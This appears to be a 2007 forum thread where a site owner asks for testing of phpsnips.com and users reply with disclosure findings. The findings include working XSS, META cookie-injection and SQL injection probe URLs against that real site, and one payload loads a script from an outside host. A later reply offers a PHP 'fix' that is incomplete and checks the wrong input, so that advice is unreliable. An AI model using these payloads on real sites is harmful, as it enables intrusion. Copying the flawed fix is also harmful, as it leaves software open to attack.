The Little Guy Posted November 27, 2007 Share Posted November 27, 2007 There are currently 47 different codes, I have tested each of them, but... I may not have found all the errors that may arise, so... if you could, please try and test some of my codes please. Thanks. Link: http://phpsnips.com (Direct links to some codes are in Signature) Link to comment Share on other sites More sharing options...
agentsteal Posted November 28, 2007 Share Posted November 28, 2007 Array: http://www.phpsnips.com/help.php?help[] Array: http://www.phpsnips.com/help.php?id[] Array: http://www.phpsnips.com/search.php?letter[] Array: http://www.phpsnips.com/search.php?search_by=1&q[] Array: http://www.phpsnips.com/snippet.php?id[] Array: http://www.phpsnips.com/snippet_comment.php?id[] Array: http://www.phpsnips.com/tempSnip.php?id[] Array: http://www.phpsnips.com/temp_snippet_comment.php?id[] Array: http://www.phpsnips.com/vote.php?id[] Cross Site Scripting: http://www.phpsnips.com/editTempSnip.php?id="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.phpsnips.com/help.php?help=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.phpsnips.com/help.php?id="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.phpsnips.com/join.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.phpsnips.com/search.php?letter=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.phpsnips.com/search.php?search_by=1&q=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.phpsnips.com/snippet.php?id="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.phpsnips.com/snippet_comment.php?id="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.phpsnips.com/tempSnip.php?id="><marquee><h1>vulnerablevulnerable</marquee> Cross Site Scripting: http://www.phpsnips.com/temp_snippet_comment.php?id="><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting when you submit a snippet if the title field contains ">code and the code field is null. Cross Site Scripting: There is Cross Site Scripting when you post a snippet if the title contains code. Cross Site Scripting: There is Cross Site Scripting on the edit snippet page if the title field contains ">code. Cross Site Scripting: There is Cross Site Scripting on the edit snippet page if the code field contains </textarea>code. Full Path Disclosure: http://www.phpsnips.com/editTempSnip.php?id[] Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in /home/.marble/ryannaddy/phpsnips.com/editTempSnip.php on line 71 META Tag Injection: http://www.phpsnips.com/help.php?help=<meta+http-equiv='Set-cookie'+content='PHPSESSID=vulnerable'> META Tag Injection: http://www.phpsnips.com/search.php?search_by=1&q=<meta+http-equiv='Set-cookie'+content='PHPSESSID=vulnerable'> SQL Dump: http://www.phpsnips.com/examples/Text1.php SQL Error: http://www.phpsnips.com/help.php?id=' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' group by uniq_id DESC LIMIT 20' at line 1 SQL Error: http://www.phpsnips.com/search.php?letter=' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' ORDER BY name' at line 1 SQL Error: http://www.phpsnips.com/snippet.php?id=' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' group by uniq_id DESC LIMIT 20' at line 1 SQL Error: http://www.phpsnips.com/snippet_comment.php?id=' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1 SQL Error: http://www.phpsnips.com/tempSnip.php?id=' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' group by uniq_id DESC LIMIT 20' at line 1 SQL Error: http://www.phpsnips.com/temp_snippet_comment.php?id=' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1 SQL Injection: http://www.phpsnips.com/snippet_comment.php?id=1' AND 1='1 http://www.phpsnips.com/snippet_comment.php?id=1' AND 1='2 Link to comment Share on other sites More sharing options...
helraizer Posted November 30, 2007 Share Posted November 30, 2007 XSS http://www.phpsnips.com/search.php?search_by=1&q=%22%3E%3Cscript%20src=http://www.helraizer.co.uk/xss1.js%3E%3C/script%3E Link to comment Share on other sites More sharing options...
The Little Guy Posted November 30, 2007 Author Share Posted November 30, 2007 XSS http://www.phpsnips.com/search.php?search_by=1&q=%22%3E%3Cscript%20src=http://www.helraizer.co.uk/xss1.js%3E%3C/script%3E How would I fix that?? Link to comment Share on other sites More sharing options...
helraizer Posted November 30, 2007 Share Posted November 30, 2007 XSS http://www.phpsnips.com/search.php?search_by=1&q=%22%3E%3Cscript%20src=http://www.helraizer.co.uk/xss1.js%3E%3C/script%3E How would I fix that?? A code I made and therefore use is: <?php if (stristr($_SERVER['PHP_SELF'], "'") || stristr($_SERVER['PHP_SELF'], '"') || stristr($_SERVER['PHP_SELF'], '<') || stristr($_SERVER['PHP_SELF'], '>') || stristr($_SERVER['PHP_SELF'], '/')) { echo "No XSS today, thank you"; //or any other message ?> That stops anyone from adding XSS to the $_GET variables in the URL of the site. for you that code would go in search.php Sam Sam Link to comment Share on other sites More sharing options...
Recommended Posts